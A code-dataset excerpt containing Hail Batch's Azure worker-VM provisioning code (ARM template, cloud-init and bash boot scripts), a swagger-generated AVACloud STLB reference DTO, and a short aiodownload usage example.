] | null | null | null | batch/batch/cloud/azure/driver/create_instance.py | daniel-goldstein/hail | 88d7f312882eaf22d16c9d58c1223e5469c98cab | [
"MIT"
] | 19 | 2022-03-03T20:11:41.000Z | 2022-03-30T20:31:57.000Z | batch/batch/cloud/azure/driver/create_instance.py | daniel-goldstein/hail | 88d7f312882eaf22d16c9d58c1223e5469c98cab | [
"MIT"
] | null | null | null | from typing import Any, Dict, Optional
import base64
import json
import logging
import os
from shlex import quote as shq
from gear.cloud_config import get_global_config
from ....batch_configuration import (DOCKER_ROOT_IMAGE, DOCKER_PREFIX, DEFAULT_NAMESPACE,
INTERNAL_GATEWAY_IP)
from ....file_store import FileStore
from ....instance_config import InstanceConfig
from ...resource_utils import unreserved_worker_data_disk_size_gib
from ..resource_utils import azure_machine_type_to_worker_type_and_cores
log = logging.getLogger('create_instance')
BATCH_WORKER_IMAGE = os.environ['HAIL_BATCH_WORKER_IMAGE']
log.info(f'BATCH_WORKER_IMAGE {BATCH_WORKER_IMAGE}')
| 38.828302 | 184 | 0.542592 | from typing import Any, Dict, Optional
import base64
import json
import logging
import os
from shlex import quote as shq
from gear.cloud_config import get_global_config
from ....batch_configuration import (DOCKER_ROOT_IMAGE, DOCKER_PREFIX, DEFAULT_NAMESPACE,
INTERNAL_GATEWAY_IP)
from ....file_store import FileStore
from ....instance_config import InstanceConfig
from ...resource_utils import unreserved_worker_data_disk_size_gib
from ..resource_utils import azure_machine_type_to_worker_type_and_cores
log = logging.getLogger('create_instance')
BATCH_WORKER_IMAGE = os.environ['HAIL_BATCH_WORKER_IMAGE']
log.info(f'BATCH_WORKER_IMAGE {BATCH_WORKER_IMAGE}')
def create_vm_config(
    file_store: FileStore,
    resource_rates: Dict[str, float],
    location: str,
    machine_name: str,
    machine_type: str,
    activation_token: str,
    max_idle_time_msecs: int,
    local_ssd_data_disk: bool,
    data_disk_size_gb: int,
    preemptible: bool,
    job_private: bool,
    subscription_id: str,
    resource_group: str,
    ssh_public_key: str,
    max_price: Optional[float],
    instance_config: InstanceConfig,
) -> dict:
    """Build the ARM deployment payload that creates one Azure batch-worker VM.

    The returned dict is the ``properties`` body of an Azure Resource Manager
    deployment: it carries an inline template (public IP, NIC, VM, OMS agent
    extension) plus the concrete parameter values for this one worker.  Two
    scripts are embedded in the VM definition:

    - ``startup_script``: a cloud-init document, base64-encoded into
      ``osProfile.customData``; on boot it extracts ``run_script`` from the
      instance's user data and launches it.
    - ``run_script``: a bash script that formats/mounts the worker data disk,
      re-homes docker, /batch and /logs onto it, configures syslog forwarding
      and iptables isolation for job containers, then runs the batch worker
      container; when the worker exits the VM deletes itself.

    :param file_store: supplies ``batch_logs_storage_uri`` and ``instance_id``
        for the worker's user data.
    :param resource_rates: rate table; only its keys are used here, to
        validate ``instance_config``.
    :param location: Azure region for all created resources.
    :param machine_name: name for the VM (also used to derive IP/NIC/disk names).
    :param machine_type: Azure VM size, e.g. ``Standard_D16ds_v4``.
    :param activation_token: secret the worker uses to register with the driver.
    :param max_idle_time_msecs: idle shutdown threshold passed to the worker.
    :param local_ssd_data_disk: if True use the VM's local/ephemeral resource
        disk; otherwise attach a managed data disk of ``data_disk_size_gb``.
    :param data_disk_size_gb: size of the worker data disk.
    :param preemptible: if True the VM is created as a Spot instance.
    :param job_private: if True the whole data disk is available to the job
        (no per-core reservation).
    :param subscription_id: Azure subscription for resource IDs built below.
    :param resource_group: resource group name; also reused as the ACR name,
        gallery prefix and workspace-name prefix by convention.
    :param ssh_public_key: key installed for the ``batch-worker`` admin user.
    :param max_price: Spot max price in USD/hour; must be None for
        nonpreemptible machines; None with ``preemptible`` means "pay up to
        on-demand price" (-1 in the billing profile).
    :param instance_config: worker configuration; serialized into user data.
    :raises ValueError: if ``max_price`` is given for a nonpreemptible VM.
    :raises AssertionError: if the computed unreserved disk size is negative
        or ``instance_config`` does not validate against ``resource_rates``.
    """
    # Only the core count matters here; the worker type is ignored.
    _, cores = azure_machine_type_to_worker_type_and_cores(machine_type)

    if max_price is not None and not preemptible:
        raise ValueError(f'max price given for a nonpreemptible machine {max_price}')

    # Job-private workers get the whole data disk; shared workers reserve a
    # per-core slice for system use (see unreserved_worker_data_disk_size_gib).
    if job_private:
        unreserved_disk_storage_gb = data_disk_size_gb
    else:
        unreserved_disk_storage_gb = unreserved_worker_data_disk_size_gib(data_disk_size_gb, cores)
    assert unreserved_disk_storage_gb >= 0

    worker_data_disk_name = 'data-disk'

    # Either use the VM's local/ephemeral resource disk, or attach a managed
    # data disk at LUN 2 (which Linux exposes at a stable by-path symlink).
    if local_ssd_data_disk:
        data_disks = []
        disk_location = '/dev/disk/azure/resource'
    else:
        data_disks = [
            {
                "name": "[concat(parameters('vmName'), '-data')]",
                "lun": 2,  # because this is 2, the data disk will always be at 'sdc'
                "managedDisk": {
                    "storageAccountType": "Standard_LRS"
                },
                "createOption": "Empty",
                "diskSizeGB": data_disk_size_gb,
                "deleteOption": 'Delete'
            }
        ]
        disk_location = '/dev/disk/azure/scsi1/lun2'

    # Shell snippet that materializes the global config as one file per key
    # under /global-config on the worker; values are shell-quoted via shq.
    make_global_config = ['mkdir /global-config']
    global_config = get_global_config()
    for name, value in global_config.items():
        make_global_config.append(f'echo -n {shq(value)} > /global-config/{name}')
    make_global_config_str = '\n'.join(make_global_config)

    assert instance_config.is_valid_configuration(resource_rates.keys())

    # cloud-init document (raw string: no Python interpolation).  On every
    # boot it pulls run_script out of the VM's user data and runs it; a
    # repeated boot (marker file /started exists) deletes the VM instead.
    startup_script = r'''#cloud-config

mounts:
  - [ ephemeral0, null ]
  - [ ephemeral0.1, null ]

write_files:
  - owner: batch-worker:batch-worker
    path: /startup.sh
    content: |
      #!/bin/sh
      set -ex
      RESOURCE_GROUP=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/resourceGroupName?api-version=2021-02-01&format=text")
      NAME=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/name?api-version=2021-02-01&format=text")
      if [ -f "/started" ]; then
          echo "instance $NAME has previously been started"
          while true; do
          az vm delete -g $RESOURCE_GROUP -n $NAME --yes
          sleep 1
          done
          exit
      else
          touch /started
      fi
      curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-02-01&format=text" | \
          base64 --decode | \
          jq -r '.run_script' > ./run.sh
      nohup /bin/bash run.sh >run.log 2>&1 &

runcmd:
  - sh /startup.sh
'''
    # cloud-init is delivered base64-encoded through osProfile.customData.
    startup_script = base64.b64encode(startup_script.encode('utf-8')).decode('utf-8')

    # The worker's main boot script (f-string: {worker_data_disk_name},
    # {unreserved_disk_storage_gb}, {disk_location} and
    # {make_global_config_str} are interpolated now; doubled braces are
    # literal braces for awk/docker at runtime).
    run_script = f'''
#!/bin/bash
set -x

WORKER_DATA_DISK_NAME="{worker_data_disk_name}"
UNRESERVED_WORKER_DATA_DISK_SIZE_GB="{unreserved_disk_storage_gb}"

# format worker data disk
sudo mkfs.xfs -f -m reflink=1 -n ftype=1 {disk_location}
sudo mkdir -p /mnt/disks/$WORKER_DATA_DISK_NAME
sudo mount -o prjquota {disk_location} /mnt/disks/$WORKER_DATA_DISK_NAME
sudo chmod a+w /mnt/disks/$WORKER_DATA_DISK_NAME
XFS_DEVICE=$(xfs_info /mnt/disks/$WORKER_DATA_DISK_NAME | head -n 1 | awk '{{ print $1 }}' | awk 'BEGIN {{ FS = "=" }}; {{ print $2 }}')

# reconfigure docker to use data disk
sudo service docker stop
sudo mv /var/lib/docker /mnt/disks/$WORKER_DATA_DISK_NAME/docker
sudo ln -s /mnt/disks/$WORKER_DATA_DISK_NAME/docker /var/lib/docker
sudo service docker start

# reconfigure /batch and /logs to use data disk
sudo mkdir -p /mnt/disks/$WORKER_DATA_DISK_NAME/batch/
sudo ln -s /mnt/disks/$WORKER_DATA_DISK_NAME/batch /batch

sudo mkdir -p /mnt/disks/$WORKER_DATA_DISK_NAME/logs/
sudo ln -s /mnt/disks/$WORKER_DATA_DISK_NAME/logs /logs

# Forward syslog logs to Log Analytics Agent
cat >>/etc/rsyslog.d/95-omsagent.conf <<EOF
kern.warning @127.0.0.1:25224
user.warning @127.0.0.1:25224
daemon.warning @127.0.0.1:25224
auth.warning @127.0.0.1:25224
syslog.warning @127.0.0.1:25224
uucp.warning @127.0.0.1:25224
authpriv.warning @127.0.0.1:25224
ftp.warning @127.0.0.1:25224
cron.warning @127.0.0.1:25224
local0.warning @127.0.0.1:25224
local1.warning @127.0.0.1:25224
local2.warning @127.0.0.1:25224
local3.warning @127.0.0.1:25224
local4.warning @127.0.0.1:25224
local5.warning @127.0.0.1:25224
local6.warning @127.0.0.1:25224
local7.warning @127.0.0.1:25224
EOF
sudo service rsyslog restart

sudo mkdir -p /etc/netns

curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-02-01&format=text" | \
    base64 --decode > userdata

SUBSCRIPTION_ID=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/subscriptionId?api-version=2021-02-01&format=text")
RESOURCE_GROUP=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/resourceGroupName?api-version=2021-02-01&format=text")
LOCATION=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/location?api-version=2021-02-01&format=text")

CORES=$(nproc)
NAMESPACE=$(jq -r '.namespace' userdata)
ACTIVATION_TOKEN=$(jq -r '.activation_token' userdata)
IP_ADDRESS=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/privateIpAddress?api-version=2021-02-01&format=text")

BATCH_LOGS_STORAGE_URI=$(jq -r '.batch_logs_storage_uri' userdata)
INSTANCE_ID=$(jq -r '.instance_id' userdata)
INSTANCE_CONFIG=$(jq -r '.instance_config' userdata)
MAX_IDLE_TIME_MSECS=$(jq -r '.max_idle_time_msecs' userdata)
NAME=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/name?api-version=2021-02-01&format=text")

BATCH_WORKER_IMAGE=$(jq -r '.batch_worker_image' userdata)
DOCKER_ROOT_IMAGE=$(jq -r '.docker_root_image' userdata)
DOCKER_PREFIX=$(jq -r '.docker_prefix' userdata)

INTERNAL_GATEWAY_IP=$(jq -r '.internal_ip' userdata)

# private job network = 172.20.0.0/16
# public job network = 172.21.0.0/16
# [all networks] Rewrite traffic coming from containers to masquerade as the host
iptables --table nat --append POSTROUTING --source 172.20.0.0/15 --jump MASQUERADE
# [public]
# Block public traffic to the metadata server
iptables --append FORWARD --source 172.21.0.0/16 --destination 169.254.169.254 --jump DROP
# But allow the internal gateway
iptables --append FORWARD --destination $INTERNAL_GATEWAY_IP --jump ACCEPT
# And this worker
iptables --append FORWARD --destination $IP_ADDRESS --jump ACCEPT
# Forbid outgoing requests to cluster-internal IP addresses
INTERNET_INTERFACE=eth0
iptables --append FORWARD --out-interface $INTERNET_INTERFACE ! --destination 10.128.0.0/16 --jump ACCEPT

cat >> /etc/hosts <<EOF
$INTERNAL_GATEWAY_IP batch-driver.hail
$INTERNAL_GATEWAY_IP batch.hail
$INTERNAL_GATEWAY_IP internal.hail
EOF

{make_global_config_str}

# retry once
az acr login --name $RESOURCE_GROUP
docker pull $BATCH_WORKER_IMAGE || \
(echo 'pull failed, retrying' && sleep 15 && docker pull $BATCH_WORKER_IMAGE)

BATCH_WORKER_IMAGE_ID=$(docker inspect $BATCH_WORKER_IMAGE --format='{{{{.Id}}}}' | cut -d':' -f2)

# So here I go it's my shot.
docker run \
    -e CLOUD=azure \
    -e CORES=$CORES \
    -e NAME=$NAME \
    -e NAMESPACE=$NAMESPACE \
    -e ACTIVATION_TOKEN=$ACTIVATION_TOKEN \
    -e IP_ADDRESS=$IP_ADDRESS \
    -e BATCH_LOGS_STORAGE_URI=$BATCH_LOGS_STORAGE_URI \
    -e INSTANCE_ID=$INSTANCE_ID \
    -e SUBSCRIPTION_ID=$SUBSCRIPTION_ID \
    -e RESOURCE_GROUP=$RESOURCE_GROUP \
    -e LOCATION=$LOCATION \
    -e DOCKER_PREFIX=$DOCKER_PREFIX \
    -e DOCKER_ROOT_IMAGE=$DOCKER_ROOT_IMAGE \
    -e INSTANCE_CONFIG=$INSTANCE_CONFIG \
    -e MAX_IDLE_TIME_MSECS=$MAX_IDLE_TIME_MSECS \
    -e BATCH_WORKER_IMAGE=$BATCH_WORKER_IMAGE \
    -e BATCH_WORKER_IMAGE_ID=$BATCH_WORKER_IMAGE_ID \
    -e INTERNET_INTERFACE=$INTERNET_INTERFACE \
    -e UNRESERVED_WORKER_DATA_DISK_SIZE_GB=$UNRESERVED_WORKER_DATA_DISK_SIZE_GB \
    -e INTERNAL_GATEWAY_IP=$INTERNAL_GATEWAY_IP \
    -v /var/run/docker.sock:/var/run/docker.sock \
    -v /var/run/netns:/var/run/netns:shared \
    -v /usr/bin/docker:/usr/bin/docker \
    -v /usr/sbin/xfs_quota:/usr/sbin/xfs_quota \
    -v /batch:/batch:shared \
    -v /logs:/logs \
    -v /global-config:/global-config \
    -v /gcsfuse:/gcsfuse:shared \
    -v /etc/netns:/etc/netns \
    -v /sys/fs/cgroup:/sys/fs/cgroup \
    --mount type=bind,source=/mnt/disks/$WORKER_DATA_DISK_NAME,target=/host \
    --mount type=bind,source=/dev,target=/dev,bind-propagation=rshared \
    -p 5000:5000 \
    --device $XFS_DEVICE \
    --device /dev \
    --privileged \
    --cap-add SYS_ADMIN \
    --security-opt apparmor:unconfined \
    --network host \
    $BATCH_WORKER_IMAGE \
    python3 -u -m batch.worker.worker >worker.log 2>&1
[ $? -eq 0 ] || tail -n 1000 worker.log

while true; do
az vm delete -g $RESOURCE_GROUP -n $NAME --yes
sleep 1
done
'''

    # JSON user data, delivered base64-encoded; startup.sh extracts
    # .run_script from it and the worker container reads the rest.
    user_data = {
        'run_script': run_script,
        'activation_token': activation_token,
        'batch_worker_image': BATCH_WORKER_IMAGE,
        'docker_root_image': DOCKER_ROOT_IMAGE,
        'docker_prefix': DOCKER_PREFIX,
        'namespace': DEFAULT_NAMESPACE,
        'internal_ip': INTERNAL_GATEWAY_IP,
        'batch_logs_storage_uri': file_store.batch_logs_storage_uri,
        'instance_id': file_store.instance_id,
        'max_idle_time_msecs': max_idle_time_msecs,
        'instance_config': base64.b64encode(json.dumps(instance_config.to_dict()).encode()).decode()
    }
    user_data_str = base64.b64encode(json.dumps(user_data).encode('utf-8')).decode('utf-8')

    # Tags applied to every created resource so workers can be found/cleaned up.
    tags = {
        'namespace': DEFAULT_NAMESPACE,
        'batch-worker': '1'
    }

    # The VM resource of the inline ARM template, including the nested
    # OMS (Log Analytics) agent extension.
    vm_config: Dict[str, Any] = {
        'apiVersion': '2021-03-01',
        'type': 'Microsoft.Compute/virtualMachines',
        'name': "[parameters('vmName')]",
        'location': "[parameters('location')]",
        'identity': {
            'type': 'UserAssigned',
            'userAssignedIdentities': {
                "[resourceId('Microsoft.ManagedIdentity/userAssignedIdentities', parameters('userAssignedIdentityName'))]": {}
            }
        },
        'tags': tags,
        'dependsOn': [
            "[concat('Microsoft.Network/networkInterfaces/', variables('nicName'))]"
        ],
        'properties': {
            'hardwareProfile': {
                'vmSize': machine_type
            },
            'networkProfile': {
                'networkInterfaces': [
                    {
                        'id': "[resourceId('Microsoft.Network/networkInterfaces', variables('nicName'))]",
                        'properties': {
                            'deleteOption': 'Delete'
                        }
                    }
                ]
            },
            'storageProfile': {
                'osDisk': {
                    'name': "[concat(parameters('vmName'), '-os')]",
                    'createOption': 'FromImage',
                    'deleteOption': 'Delete',
                    'caching': 'ReadOnly',
                    'managedDisk': {
                        'storageAccountType': 'Standard_LRS'
                    }
                },
                'imageReference': "[parameters('imageReference')]",
                'dataDisks': data_disks
            },
            'osProfile': {
                'computerName': "[parameters('vmName')]",
                'adminUsername': "[parameters('adminUsername')]",
                # customData carries the base64-encoded cloud-init document.
                'customData': "[parameters('startupScript')]",
                'linuxConfiguration': {
                    'disablePasswordAuthentication': True,
                    'ssh': {
                        'publicKeys': [
                            {
                                'keyData': "[parameters('sshKey')]",
                                'path': "[concat('/home/', parameters('adminUsername'), '/.ssh/authorized_keys')]"
                            }
                        ]
                    }
                }
            },
            'userData': "[parameters('userData')]"
        },
        'resources': [
            {
                'apiVersion': '2018-06-01',
                'type': 'extensions',
                'name': 'OMSExtension',
                'location': "[parameters('location')]",
                'tags': tags,
                'dependsOn': [
                    "[concat('Microsoft.Compute/virtualMachines/', parameters('vmName'))]"
                ],
                'properties': {
                    'publisher': 'Microsoft.EnterpriseCloud.Monitoring',
                    'type': 'OmsAgentForLinux',
                    'typeHandlerVersion': '1.13',
                    'autoUpgradeMinorVersion': True,
                    'settings': {
                        'workspaceId': "[reference(resourceId('Microsoft.OperationalInsights/workspaces/', parameters('workspaceName')), '2015-03-20').customerId]"
                    },
                    'protectedSettings': {
                        'workspaceKey': "[listKeys(resourceId('Microsoft.OperationalInsights/workspaces/', parameters('workspaceName')), '2015-03-20').primarySharedKey]"
                    }
                }
            },
        ]
    }

    # Spot VMs are evicted with 'Delete'; maxPrice -1 means "up to the
    # on-demand price".
    properties = vm_config['properties']
    if preemptible:
        properties['priority'] = 'Spot'
        properties['evictionPolicy'] = 'Delete'
        properties['billingProfile'] = {'maxPrice': max_price if max_price is not None else -1}
    else:
        properties['priority'] = 'Regular'

    # Full deployment-properties payload: concrete parameter values plus the
    # inline template (public IP, NIC, the VM above).
    return {
        'tags': tags,
        'properties': {
            'mode': 'Incremental',
            'parameters': {
                'location': {
                    'value': location
                },
                'vmName': {
                    'value': machine_name
                },
                'sshKey': {
                    'value': ssh_public_key
                },
                'subnetId': {
                    'value': f'/subscriptions/{subscription_id}/resourceGroups/{resource_group}/providers/Microsoft.Network/virtualNetworks/default/subnets/batch-worker-subnet'
                },
                'adminUsername': {
                    'value': 'batch-worker'
                },
                'userAssignedIdentityName': {
                    'value': 'batch-worker'
                },
                'startupScript': {
                    'value': startup_script
                },
                'userData': {
                    'value': user_data_str
                },
                'imageReference': {
                    'value': {
                        'id': f'/subscriptions/{subscription_id}/resourceGroups/{resource_group}/providers/'
                        f'Microsoft.Compute/galleries/{resource_group}_batch/images/batch-worker/versions/0.0.12'
                    }
                },
                'workspaceName': {
                    'value': f'{resource_group}-logs',
                }
            },
            'template': {
                '$schema': 'https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#',
                'contentVersion': '1.0.0.0',
                'parameters': {
                    'location': {
                        'type': 'string',
                        'defaultValue': '[resourceGroup().location]'
                    },
                    'vmName': {
                        'type': 'string'
                    },
                    'sshKey': {
                        'type': 'securestring'
                    },
                    'subnetId': {
                        'type': 'string'
                    },
                    'adminUsername': {
                        'type': 'string',
                        'defaultValue': 'admin'
                    },
                    'userAssignedIdentityName': {
                        'type': 'string',
                        'defaultValue': 'batch-worker'
                    },
                    'startupScript': {
                        'type': 'string'
                    },
                    'userData': {
                        'type': 'string'
                    },
                    'imageReference': {
                        'type': 'object',
                        # Fallback image; normally overridden by the gallery
                        # image id passed in 'parameters' above.
                        'defaultValue':
                            {
                                'publisher': 'Canonical',
                                'offer': 'UbuntuServer',
                                'sku': '18.04-LTS',
                                'version': 'latest'
                            }
                    },
                    'workspaceName': {
                        'type': 'string'
                    },
                },
                'variables': {
                    'ipName': "[concat(parameters('vmName'), '-ip')]",
                    'nicName': "[concat(parameters('vmName'), '-nic')]",
                    'ipconfigName': "[concat(parameters('vmName'), '-ipconfig')]",
                },
                'resources': [
                    {
                        'apiVersion': '2018-01-01',
                        'type': 'Microsoft.Network/publicIPAddresses',
                        'name': "[variables('ipName')]",
                        'location': "[parameters('location')]",
                        'tags': tags,
                        'dependsOn': [],
                        'properties': {
                            'publicIPAllocationMethod': 'Static'
                        }
                    },
                    {
                        'apiVersion': '2015-06-15',
                        'type': 'Microsoft.Network/networkInterfaces',
                        'name': "[variables('nicName')]",
                        'location': "[parameters('location')]",
                        'tags': tags,
                        'dependsOn': [
                            "[concat('Microsoft.Network/publicIPAddresses/', variables('ipName'))]"
                        ],
                        'properties': {
                            'ipConfigurations': [
                                {
                                    'name': "[variables('ipconfigName')]",
                                    'properties': {
                                        'publicIPAddress': {
                                            'id': "[resourceId('Microsoft.Network/publicIpAddresses', variables('ipName'))]",
                                            'properties': {
                                                'deleteOption': 'Delete'
                                            }
                                        },
                                        'privateIPAllocationMethod': 'Dynamic',
                                        'subnet': {
                                            'id': "[parameters('subnetId')]"
                                        }
                                    }
                                }
                            ],
                            'networkSecurityGroup': {
                                'id': f'/subscriptions/{subscription_id}/resourceGroups/{resource_group}'
                                f'/providers/Microsoft.Network/networkSecurityGroups/batch-worker-nsg'
                            }
                        }
                    },
                    vm_config
                ],
                'outputs': {}
            }
        }
    }
| 19,852 | 0 | 23 |
c976e216d8c906c85552f7ac3a219e05322c54d4 | 7,582 | py | Python | avacloud_client_python/models/stlb_reference_dto.py | Dangl-IT/avacloud-client-python | 66f555096bbbc87d02d02e4e2dfb0c6accb18f95 | [
"RSA-MD"
] | 1 | 2019-01-12T18:10:24.000Z | 2019-01-12T18:10:24.000Z | avacloud_client_python/models/stlb_reference_dto.py | Dangl-IT/avacloud-client-python | 66f555096bbbc87d02d02e4e2dfb0c6accb18f95 | [
"RSA-MD"
] | null | null | null | avacloud_client_python/models/stlb_reference_dto.py | Dangl-IT/avacloud-client-python | 66f555096bbbc87d02d02e4e2dfb0c6accb18f95 | [
"RSA-MD"
] | null | null | null | # coding: utf-8
"""
AVACloud API 1.17.3
AVACloud API specification # noqa: E501
OpenAPI spec version: 1.17.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class STLBReferenceDto(object):
    """Reference into the STLB catalogue attached to a service specification.

    NOTE: Originally produced by the swagger code generator.  The public
    interface (constructor keywords, properties, ``to_dict``/``to_str``,
    equality) is preserved exactly as generated.
    """

    # swagger_types: attribute name -> swagger type of its value.
    swagger_types = {
        'version_date': 'datetime',
        'catalogue_name': 'str',
        'group': 'str',
        'cost_group': 'str',
        'service_area': 'str',
        'keys': 'list[STLBKeyDto]'
    }

    # attribute_map: python attribute name -> JSON field name.
    attribute_map = {
        'version_date': 'versionDate',
        'catalogue_name': 'catalogueName',
        'group': 'group',
        'cost_group': 'costGroup',
        'service_area': 'serviceArea',
        'keys': 'keys'
    }

    def __init__(self, version_date=None, catalogue_name=None, group=None, cost_group=None, service_area=None, keys=None):  # noqa: E501
        """Initialize the DTO; only keyword values that are not None are applied."""
        provided = {
            'version_date': version_date,
            'catalogue_name': catalogue_name,
            'group': group,
            'cost_group': cost_group,
            'service_area': service_area,
            'keys': keys,
        }
        # Back every declared attribute with a private None-initialized slot.
        for attr in self.swagger_types:
            setattr(self, '_' + attr, None)
        self.discriminator = None
        # Route non-None arguments through the property setters.
        for attr, value in provided.items():
            if value is not None:
                setattr(self, attr, value)

    @property
    def version_date(self):
        """Date of the STLB version; typically only year and month are used."""
        return self._version_date

    @version_date.setter
    def version_date(self, version_date):
        self._version_date = version_date

    @property
    def catalogue_name(self):
        """Name of the catalogue within the STLB."""
        return self._catalogue_name

    @catalogue_name.setter
    def catalogue_name(self, catalogue_name):
        self._catalogue_name = catalogue_name

    @property
    def group(self):
        """Name of the group in the STLB."""
        return self._group

    @group.setter
    def group(self, group):
        self._group = group

    @property
    def cost_group(self):
        """Cost group this service is associated with."""
        return self._cost_group

    @cost_group.setter
    def cost_group(self, cost_group):
        self._cost_group = cost_group

    @property
    def service_area(self):
        """Service area (or type) in the STLB."""
        return self._service_area

    @service_area.setter
    def service_area(self, service_area):
        self._service_area = service_area

    @property
    def keys(self):
        """Optional STLBKeyDto list referencing specific items within the STLB."""
        return self._keys

    @keys.setter
    def keys(self, keys):
        self._keys = keys

    def to_dict(self):
        """Return the model's properties as a plain dict."""

        def _plain(value):
            # Recursively unwrap nested models (anything exposing to_dict).
            if isinstance(value, list):
                return [v.to_dict() if hasattr(v, 'to_dict') else v for v in value]
            if hasattr(value, 'to_dict'):
                return value.to_dict()
            if isinstance(value, dict):
                return {k: v.to_dict() if hasattr(v, 'to_dict') else v
                        for k, v in value.items()}
            return value

        result = {attr: _plain(getattr(self, attr)) for attr in self.swagger_types}
        # Generated escape hatch for dict-derived models; never taken here.
        if issubclass(STLBReferenceDto, dict):
            for key, value in self.items():
                result[key] = value
        return result

    def to_str(self):
        """Return a pretty-printed string representation of the model."""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """Used by `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Two DTOs are equal when they share type and attribute state."""
        return isinstance(other, STLBReferenceDto) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of ``__eq__``."""
        return not self == other
| 29.387597 | 136 | 0.595489 | # coding: utf-8
"""
AVACloud API 1.17.3
AVACloud API specification # noqa: E501
OpenAPI spec version: 1.17.3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class STLBReferenceDto(object):
    """Reference into the STLB catalogue attached to a service specification.

    NOTE: Originally produced by the swagger code generator.  The public
    interface (constructor keywords, properties, ``to_dict``/``to_str``,
    equality) is preserved exactly as generated.
    """

    # swagger_types: attribute name -> swagger type of its value.
    swagger_types = {
        'version_date': 'datetime',
        'catalogue_name': 'str',
        'group': 'str',
        'cost_group': 'str',
        'service_area': 'str',
        'keys': 'list[STLBKeyDto]'
    }

    # attribute_map: python attribute name -> JSON field name.
    attribute_map = {
        'version_date': 'versionDate',
        'catalogue_name': 'catalogueName',
        'group': 'group',
        'cost_group': 'costGroup',
        'service_area': 'serviceArea',
        'keys': 'keys'
    }

    def __init__(self, version_date=None, catalogue_name=None, group=None, cost_group=None, service_area=None, keys=None):  # noqa: E501
        """Initialize the DTO; only keyword values that are not None are applied."""
        provided = {
            'version_date': version_date,
            'catalogue_name': catalogue_name,
            'group': group,
            'cost_group': cost_group,
            'service_area': service_area,
            'keys': keys,
        }
        # Back every declared attribute with a private None-initialized slot.
        for attr in self.swagger_types:
            setattr(self, '_' + attr, None)
        self.discriminator = None
        # Route non-None arguments through the property setters.
        for attr, value in provided.items():
            if value is not None:
                setattr(self, attr, value)

    @property
    def version_date(self):
        """Date of the STLB version; typically only year and month are used."""
        return self._version_date

    @version_date.setter
    def version_date(self, version_date):
        self._version_date = version_date

    @property
    def catalogue_name(self):
        """Name of the catalogue within the STLB."""
        return self._catalogue_name

    @catalogue_name.setter
    def catalogue_name(self, catalogue_name):
        self._catalogue_name = catalogue_name

    @property
    def group(self):
        """Name of the group in the STLB."""
        return self._group

    @group.setter
    def group(self, group):
        self._group = group

    @property
    def cost_group(self):
        """Cost group this service is associated with."""
        return self._cost_group

    @cost_group.setter
    def cost_group(self, cost_group):
        self._cost_group = cost_group

    @property
    def service_area(self):
        """Service area (or type) in the STLB."""
        return self._service_area

    @service_area.setter
    def service_area(self, service_area):
        self._service_area = service_area

    @property
    def keys(self):
        """Optional STLBKeyDto list referencing specific items within the STLB."""
        return self._keys

    @keys.setter
    def keys(self, keys):
        self._keys = keys

    def to_dict(self):
        """Return the model's properties as a plain dict."""

        def _plain(value):
            # Recursively unwrap nested models (anything exposing to_dict).
            if isinstance(value, list):
                return [v.to_dict() if hasattr(v, 'to_dict') else v for v in value]
            if hasattr(value, 'to_dict'):
                return value.to_dict()
            if isinstance(value, dict):
                return {k: v.to_dict() if hasattr(v, 'to_dict') else v
                        for k, v in value.items()}
            return value

        result = {attr: _plain(getattr(self, attr)) for attr in self.swagger_types}
        # Generated escape hatch for dict-derived models; never taken here.
        if issubclass(STLBReferenceDto, dict):
            for key, value in self.items():
                result[key] = value
        return result

    def to_str(self):
        """Return a pretty-printed string representation of the model."""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """Used by `print` and `pprint`."""
        return self.to_str()

    def __eq__(self, other):
        """Two DTOs are equal when they share type and attribute state."""
        return isinstance(other, STLBReferenceDto) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of ``__eq__``."""
        return not self == other
| 0 | 0 | 0 |
d8461cf5c51d4e051e54d79bad3280158598aa60 | 735 | py | Python | aiodownload/example/03_each.py | jelloslinger/aiodownload | 29b3bc49cdaec9615933d326b338865fd903571c | [
"MIT"
] | 10 | 2017-05-25T23:02:00.000Z | 2020-04-04T16:18:56.000Z | aiodownload/example/03_each.py | jelloslinger/aiodownload | 29b3bc49cdaec9615933d326b338865fd903571c | [
"MIT"
] | null | null | null | aiodownload/example/03_each.py | jelloslinger/aiodownload | 29b3bc49cdaec9615933d326b338865fd903571c | [
"MIT"
] | null | null | null | import aiodownload
from aiodownload.example import logger
if __name__ == '__main__':
main()
| 22.272727 | 79 | 0.62585 | import aiodownload
from aiodownload.example import logger
class Example:
    """Tiny value object pairing a number with a boolean flag."""

    def __init__(self, number, flag):
        """Remember the number/flag pair on the instance."""
        self.number, self.flag = number, flag
def main():
    """Fetch one httpbin page per Example and branch on each flag."""
    examples = [Example(idx, idx % 2 == 0) for idx in range(0, 5)]

    def build_url(example):
        # Map an Example onto the URL that should be downloaded for it.
        return 'https://httpbin.org/links/{}'.format(example.number)

    for bundle in aiodownload.each(examples, url_map=build_url):
        if bundle.info.flag:
            logger.info(bundle.status_msg + ' Flag is True')
            # Do some type of processing on this bundle
        else:
            logger.warning(bundle.status_msg + ' Flag is False')
            # Do some alternate type of processing on this bundle


if __name__ == '__main__':
    main()
| 569 | -7 | 73 |
